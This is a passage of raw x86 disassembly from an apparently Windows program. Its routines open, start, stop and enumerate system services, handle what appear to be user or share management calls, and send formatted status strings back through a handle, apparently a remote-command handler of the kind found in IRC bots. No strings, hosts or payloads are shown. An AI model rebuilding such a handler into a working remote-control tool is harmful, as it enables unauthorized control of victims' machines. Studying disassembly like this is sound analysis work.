push offset dword_42F3E4
push ebx
inc esi
call sub_411C60
push offset dword_42A2E0
push eax
call sub_411C60
push dword ptr [ebp+8]
mov edi, eax
push offset dword_423034
call sub_410930
add esp, 20h
test eax, eax
jz short loc_40E1E6
lea eax, [ebp-0C4h]
push edi
push eax
lea eax, [ebp-0C4h]
push eax
push offset dword_42A2B8
push dword ptr [ebp+0Ch]
call sub_40E321
lea eax, [ebp-0C4h]
push eax
push offset dword_42A294
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
push esi
push offset dword_42A254
jmp short loc_40E242
; ---------------------------------------------------------------------------
loc_40E1E6: ; CODE XREF: seg000:0040E1AB�j
mov dword ptr [ebp+2Ch], offset dword_4230D8
loc_40E1ED: ; CODE XREF: seg000:0040E209�j
mov eax, [ebp+2Ch]
push edi
push dword ptr [eax]
call sub_410310
pop ecx
test eax, eax
pop ecx
jnz short loc_40E256
add dword ptr [ebp+2Ch], 4
cmp dword ptr [ebp+2Ch], offset dword_4230DC
jl short loc_40E1ED
lea eax, [ebp-0C4h]
push edi
push eax
lea eax, [ebp-0C4h]
push eax
push offset dword_42A2B8
push dword ptr [ebp+0Ch]
call sub_40E321
lea eax, [ebp-0C4h]
push eax
push offset dword_42A294
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
push esi
push offset dword_42A214
loc_40E242: ; CODE XREF: seg000:0040E1E4�j
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 30h
jmp loc_40C67D
; ---------------------------------------------------------------------------
loc_40E256: ; CODE XREF: seg000:0040E1FC�j
mov edi, [ebp+20h]
xor esi, esi
loc_40E25B: ; CODE XREF: seg000:0040E285�j
cmp [ebp+8], ebx
jz loc_40980B
cmp [edi], bl
jnz short loc_40E27B
push dword ptr [ebp+8]
push offset dword_423034
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40E28C
loc_40E27B: ; CODE XREF: seg000:0040E266�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40E25B
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40E28C: ; CODE XREF: seg000:0040E279�j
shl esi, 7
add esi, [ebp+20h]
lea eax, [ebp-0A94h]
push 7Fh
push eax
push esi
call sub_411D00
add esp, 0Ch
cmp [ebp-8], ebx
jnz short loc_40E2C3
push ebx
push dword ptr [ebp-4]
push offset dword_42A1E0
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40E2C3: ; CODE XREF: seg000:0040E2A7�j
lea eax, [ebp-0C4h]
push eax
push offset dword_42A1AC
loc_40E2CF: ; CODE XREF: seg000:0040992B�j
; seg000:0040DDC7�j
call sub_407E82
pop ecx
loc_40E2D5: ; CODE XREF: seg000:0040B46E�j
pop ecx
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40E2DB: ; CODE XREF: seg000:0040959E�j
; seg000:004095B3�j
push dword ptr [ebp+18h]
push offset dword_42A19C
push dword ptr [ebp+0Ch]
call sub_40E321
push offset dword_4230AC
push dword ptr [ebp+18h]
push offset dword_42A18C
push dword ptr [ebp+0Ch]
call sub_40E321
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push offset dword_42CB88
push dword ptr [ebp+0Ch]
call sub_40E321
add esp, 2Ch
mov ds:dword_45ED48, edi
jmp loc_40962D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E321 proc near ; CODE XREF: sub_409218+3D�p
; seg000:0040955B�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41232F
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4307E0
leave
retn
sub_40E321 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E367 proc near ; CODE XREF: start+88�p
; seg000:004014BD�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset dword_42CA94
jnz short loc_40E382
mov edi, offset dword_42CA9C
loc_40E382: ; CODE XREF: sub_40E367+14�j
push edi
call sub_410B60
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_410B60
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset dword_41F970
push esi
push eax
call sub_410A8A
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_42CC40
push eax
call sub_41050B
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4307E0
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40E400
push 7D0h
call ds:dword_41C058 ; Sleep
locret_40E400: ; CODE XREF: sub_40E367+8C�j
leave
retn
sub_40E367 endp
; =============== S U B R O U T I N E =======================================
sub_40E402 proc near ; CODE XREF: seg000:loc_40AA82�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40E467
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push ds:dword_42CC58[esi]
push edi
push eax
call sub_40E489
add esp, 14h
test eax, eax
jnz short loc_40E44A
push edi
push ds:dword_42CC54[esi]
mov esi, offset dword_45F410
push offset dword_42CD8C
push esi
call sub_41050B
add esp, 10h
jmp short loc_40E484
; ---------------------------------------------------------------------------
loc_40E44A: ; CODE XREF: sub_40E402+2A�j
push eax
call sub_40E52B
push eax
push edi
mov esi, offset dword_45F410
push offset dword_42CD50
push esi
call sub_41050B
add esp, 14h
jmp short loc_40E484
; ---------------------------------------------------------------------------
loc_40E467: ; CODE XREF: sub_40E402+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_45F410
push ds:dword_42CC50[eax*4]
push offset dword_42CD18
push esi
call sub_41050B
add esp, 0Ch
loc_40E484: ; CODE XREF: sub_40E402+46�j
; sub_40E402+63�j
mov eax, esi
pop edi
pop esi
retn
sub_40E402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E489 proc near ; CODE XREF: sub_40E402+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_430788
mov edi, eax
cmp edi, ebx
jnz short loc_40E4B0
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40E525
; ---------------------------------------------------------------------------
loc_40E4B0: ; CODE XREF: sub_40E489+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_43068C
mov esi, eax
cmp esi, ebx
jnz short loc_40E4D0
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40E51D
; ---------------------------------------------------------------------------
loc_40E4D0: ; CODE XREF: sub_40E489+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40E503
cmp eax, 3
jz short loc_40E4F4
jle short loc_40E516
cmp eax, 6
jg short loc_40E516
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_4306F4
jmp short loc_40E50A
; ---------------------------------------------------------------------------
loc_40E4F4: ; CODE XREF: sub_40E489+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_430694
jmp short loc_40E50A
; ---------------------------------------------------------------------------
loc_40E503: ; CODE XREF: sub_40E489+4D�j
push esi
call ds:dword_4306F8
loc_40E50A: ; CODE XREF: sub_40E489+69�j
; sub_40E489+78�j
test eax, eax
jnz short loc_40E516
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ebx, eax
loc_40E516: ; CODE XREF: sub_40E489+54�j
; sub_40E489+59�j ...
push esi
call ds:dword_4306A8
loc_40E51D: ; CODE XREF: sub_40E489+45�j
push edi
call ds:dword_4306A8
pop esi
loc_40E525: ; CODE XREF: sub_40E489+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40E489 endp
; =============== S U B R O U T I N E =======================================
sub_40E52B proc near ; CODE XREF: sub_40E402+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40E5E0
jz loc_40E5D9
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40E5A3
jz short loc_40E599
mov ecx, eax
sub ecx, 3
jz short loc_40E58F
dec ecx
dec ecx
jz short loc_40E585
dec ecx
jz short loc_40E57B
sub ecx, 51h
jz short loc_40E571
sub ecx, 24h
jnz loc_40E656 ; default
; jumptable 0040E5FD cases 1,5,6,8,9,12,13,15,16
push offset dword_42D230
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E571: ; CODE XREF: sub_40E52B+31�j
push offset dword_42D204
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E57B: ; CODE XREF: sub_40E52B+2C�j
push offset dword_42D1EC
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E585: ; CODE XREF: sub_40E52B+29�j
push offset dword_42D1B8
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E58F: ; CODE XREF: sub_40E52B+25�j
push offset dword_42D18C
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E599: ; CODE XREF: sub_40E52B+1E�j
push offset dword_42D138
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E5A3: ; CODE XREF: sub_40E52B+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40E5D2
dec ecx
jz short loc_40E5CB
dec ecx
jz short loc_40E5C4
dec ecx
jnz loc_40E656 ; default
; jumptable 0040E5FD cases 1,5,6,8,9,12,13,15,16
push offset dword_42D120
jmp loc_40E648
; ---------------------------------------------------------------------------
loc_40E5C4: ; CODE XREF: sub_40E52B+86�j
push offset dword_42D0F0
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E5CB: ; CODE XREF: sub_40E52B+83�j
push offset dword_42D094
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E5D2: ; CODE XREF: sub_40E52B+80�j
push offset dword_42D044
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E5D9: ; CODE XREF: sub_40E52B+11�j
push offset dword_42D014
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E5E0: ; CODE XREF: sub_40E52B+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40E656 ; default
; jumptable 0040E5FD cases 1,5,6,8,9,12,13,15,16
jz short loc_40E643
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40E656 ; default
; jumptable 0040E5FD cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_40E697[ecx]
jmp ds:off_40E66F[ecx*4] ; switch jump
loc_40E604: ; DATA XREF: seg000:off_40E66F�o
push offset dword_42CFEC ; jumptable 0040E5FD case 7
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E60B: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CF94 ; jumptable 0040E5FD case 17
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E612: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CF50 ; jumptable 0040E5FD case 10
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E619: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CF30 ; jumptable 0040E5FD case 0
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E620: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CF08 ; jumptable 0040E5FD case 2
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E627: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CEAC ; jumptable 0040E5FD case 11
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E62E: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CE80 ; jumptable 0040E5FD case 14
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E635: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CE24 ; jumptable 0040E5FD case 3
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E63C: ; CODE XREF: sub_40E52B+D2�j
; DATA XREF: seg000:off_40E66F�o
push offset dword_42CE00 ; jumptable 0040E5FD case 4
jmp short loc_40E648
; ---------------------------------------------------------------------------
loc_40E643: ; CODE XREF: sub_40E52B+BE�j
push offset dword_42CDE0
loc_40E648: ; CODE XREF: sub_40E52B+41�j
; sub_40E52B+4B�j ...
push offset dword_45ED50
call sub_41050B
pop ecx
pop ecx
jmp short loc_40E669
; ---------------------------------------------------------------------------
loc_40E656: ; CODE XREF: sub_40E52B+36�j
; sub_40E52B+89�j ...
push eax ; default
; jumptable 0040E5FD cases 1,5,6,8,9,12,13,15,16
push offset dword_42CDBC
push offset dword_45ED50
call sub_41050B
add esp, 0Ch
loc_40E669: ; CODE XREF: sub_40E52B+129�j
mov eax, offset dword_45ED50
retn
sub_40E52B endp
; ---------------------------------------------------------------------------
off_40E66F dd offset loc_40E619 ; DATA XREF: sub_40E52B+D2�r
dd offset loc_40E620 ; jump table for switch statement
dd offset loc_40E635
dd offset loc_40E63C
dd offset loc_40E604
dd offset loc_40E612
dd offset loc_40E627
dd offset loc_40E62E
dd offset loc_40E60B
dd offset loc_40E656
byte_40E697 db 0, 9, 1, 2 ; DATA XREF: sub_40E52B+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6A9 proc near ; CODE XREF: seg000:0040AAAD�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_430788
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset dword_42D2C4
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
loc_40E6E1: ; CODE XREF: sub_40E6A9+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_430758
test eax, eax
jnz short loc_40E71B
call ds:dword_41C068 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40E7CF
loc_40E71B: ; CODE XREF: sub_40E6A9+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40E7C6
lea esi, [ebp+var_188]
loc_40E72C: ; CODE XREF: sub_40E6A9+117�j
mov eax, [esi+8]
dec eax
jz short loc_40E775
dec eax
jz short loc_40E76E
dec eax
jz short loc_40E767
dec eax
jz short loc_40E760
dec eax
jz short loc_40E759
dec eax
jz short loc_40E752
dec eax
jz short loc_40E74B
push offset dword_42D2B8
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E74B: ; CODE XREF: sub_40E6A9+99�j
push offset dword_42D2AC
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E752: ; CODE XREF: sub_40E6A9+96�j
push offset dword_42D2A0
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E759: ; CODE XREF: sub_40E6A9+93�j
push offset dword_42D294
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E760: ; CODE XREF: sub_40E6A9+90�j
push offset dword_42D288
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E767: ; CODE XREF: sub_40E6A9+8D�j
push offset dword_42D27C
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E76E: ; CODE XREF: sub_40E6A9+8A�j
push offset dword_42D270
jmp short loc_40E77A
; ---------------------------------------------------------------------------
loc_40E775: ; CODE XREF: sub_40E6A9+87�j
push offset dword_42D264
loc_40E77A: ; CODE XREF: sub_40E6A9+A0�j
; sub_40E6A9+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_41050B
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset dword_42D258
push eax
call sub_41050B
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_40E72C
loc_40E7C6: ; CODE XREF: sub_40E6A9+77�j
cmp [ebp+var_8], ebx
jnz loc_40E6E1
loc_40E7CF: ; CODE XREF: sub_40E6A9+6C�j
push [ebp+var_C]
call ds:dword_4306A8
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40E6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E7E6 proc near ; CODE XREF: seg000:loc_40AB64�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40E87F
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40E80F
dec eax
jnz short loc_40E85F
push edi
push 0
call sub_40E9B8
pop ecx
pop ecx
jmp short loc_40E85B
; ---------------------------------------------------------------------------
loc_40E80F: ; CODE XREF: sub_40E7E6+18�j
cmp [ebp+arg_8], 0
jnz short loc_40E84D
push 24h
push edi
call sub_412760
pop ecx
test eax, eax
pop ecx
jnz short loc_40E84D
push 57h
pop eax
loc_40E826: ; CODE XREF: sub_40E7E6+77�j
push eax
call sub_40F190
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_45F00C
push ds:dword_42CC50[eax*4]
push offset dword_42D35C
push esi
call sub_41050B
add esp, 18h
jmp short loc_40E89F
; ---------------------------------------------------------------------------
loc_40E84D: ; CODE XREF: sub_40E7E6+2D�j
; sub_40E7E6+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40E90C
add esp, 0Ch
loc_40E85B: ; CODE XREF: sub_40E7E6+27�j
test eax, eax
jnz short loc_40E826
loc_40E85F: ; CODE XREF: sub_40E7E6+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_45F00C
push ds:dword_42CC54[eax*4]
push offset dword_42D32C
push esi
call sub_41050B
add esp, 10h
jmp short loc_40E89F
; ---------------------------------------------------------------------------
loc_40E87F: ; CODE XREF: sub_40E7E6+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_45F00C
lea eax, [eax+eax*2]
push ds:dword_42CC50[eax*4]
push offset dword_42D2F4
push esi
call sub_41050B
add esp, 0Ch
loc_40E89F: ; CODE XREF: sub_40E7E6+65�j
; sub_40E7E6+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40E7E6 endp
; =============== S U B R O U T I N E =======================================
sub_40E8A5 proc near ; CODE XREF: sub_40FC75+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40E8B2
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E8B2: ; CODE XREF: sub_40E8A5+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_41C11C
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_45F20C, 1
mov ebp, eax
jnz short loc_40E8EF
or ds:byte_45F20C, 1
lea eax, [ebp+1]
push eax
call sub_411605
pop ecx
mov ds:dword_45EFAC, eax
loc_40E8EF: ; CODE XREF: sub_40E8A5+32�j
push esi
push esi
push ebp
push ds:dword_45EFAC
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_45EFAC
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40E8A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E90C proc near ; CODE XREF: sub_40E7E6+6D�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40E977
push [ebp+arg_4]
mov edi, eax
call sub_40E977
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_412760
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40E977
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_4306A4
pop edi
leave
retn
sub_40E90C endp
; =============== S U B R O U T I N E =======================================
sub_40E977 proc near ; CODE XREF: sub_40E90C+A�p
; sub_40E90C+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40E984
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E984: ; CODE XREF: sub_40E977+9�j
push ebx
push esi
mov esi, ds:dword_41C120
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_411605
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40E977 endp
; =============== S U B R O U T I N E =======================================
sub_40E9B8 proc near ; CODE XREF: sub_40E7E6+20�p
; sub_40FC75+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40E977
push [esp+8+arg_4]
mov esi, eax
call sub_40E977
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_430680
pop esi
retn
sub_40E9B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9DB proc near ; CODE XREF: seg000:0040AB90�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40E977
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset dword_42D3F8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 18h
loc_40EA14: ; CODE XREF: sub_40E9DB+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_4306F0
mov ebx, eax
cmp ebx, esi
jz short loc_40EA77
cmp ebx, 0EAh
jz short loc_40EA77
push ebx
push ebx
call sub_40F190
pop ecx
push eax
lea eax, [ebp+var_210]
push offset dword_42D3BC
push eax
call sub_41050B
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 24h
jmp short loc_40EAE4
; ---------------------------------------------------------------------------
loc_40EA77: ; CODE XREF: sub_40E9DB+5D�j
; sub_40E9DB+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40EADB
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40EA85: ; CODE XREF: sub_40E9DB+FC�j
push dword ptr [esi+10h]
call ds:dword_430698
test eax, eax
mov eax, offset dword_42D3B8
jnz short loc_40EA9C
mov eax, offset dword_42D3B4
loc_40EA9C: ; CODE XREF: sub_40E9DB+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset dword_42D39C
push eax
call sub_41050B
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40EA85
xor esi, esi
loc_40EADB: ; CODE XREF: sub_40E9DB+A2�j
push [ebp+var_4]
call ds:dword_430820
loc_40EAE4: ; CODE XREF: sub_40E9DB+9A�j
cmp ebx, 0EAh
jz loc_40EA14
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E9DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EAFC proc near ; CODE XREF: seg000:loc_40AC06�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40EBA0
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40EB3E
dec eax
jz short loc_40EB33
dec eax
jnz short loc_40EB59
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40EC42
add esp, 14h
jmp short loc_40EB55
; ---------------------------------------------------------------------------
loc_40EB33: ; CODE XREF: sub_40EAFC+1D�j
push ebx
push edi
call sub_40EC21
pop ecx
pop ecx
jmp short loc_40EB55
; ---------------------------------------------------------------------------
loc_40EB3E: ; CODE XREF: sub_40EAFC+1A�j
cmp [ebp+arg_8], edi
jz short loc_40EB52
push [ebp+arg_8]
push ebx
push edi
call sub_40EBC7
add esp, 0Ch
jmp short loc_40EB55
; ---------------------------------------------------------------------------
loc_40EB52: ; CODE XREF: sub_40EAFC+45�j
push 57h
pop eax
loc_40EB55: ; CODE XREF: sub_40EAFC+35�j
; sub_40EAFC+40�j ...
cmp eax, edi
jnz short loc_40EB79
loc_40EB59: ; CODE XREF: sub_40EAFC+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_45F210
push ds:dword_42CC54[eax*4]
push offset dword_42D4AC
push esi
call sub_41050B
add esp, 10h
jmp short loc_40EBC0
; ---------------------------------------------------------------------------
loc_40EB79: ; CODE XREF: sub_40EAFC+5B�j
push eax
call sub_40F190
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_45F210
push ds:dword_42CC50[eax*4]
push offset dword_42D46C
push esi
call sub_41050B
add esp, 18h
jmp short loc_40EBC0
; ---------------------------------------------------------------------------
loc_40EBA0: ; CODE XREF: sub_40EAFC+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_45F210
lea eax, [eax+eax*2]
push ds:dword_42CC50[eax*4]
push offset dword_42D430
push esi
call sub_41050B
add esp, 0Ch
loc_40EBC0: ; CODE XREF: sub_40EAFC+7B�j
; sub_40EAFC+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40EAFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EBC7 proc near ; CODE XREF: sub_40EAFC+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40E977
push [ebp+arg_4]
mov edi, eax
call sub_40E977
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40E977
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_430688
pop edi
leave
retn
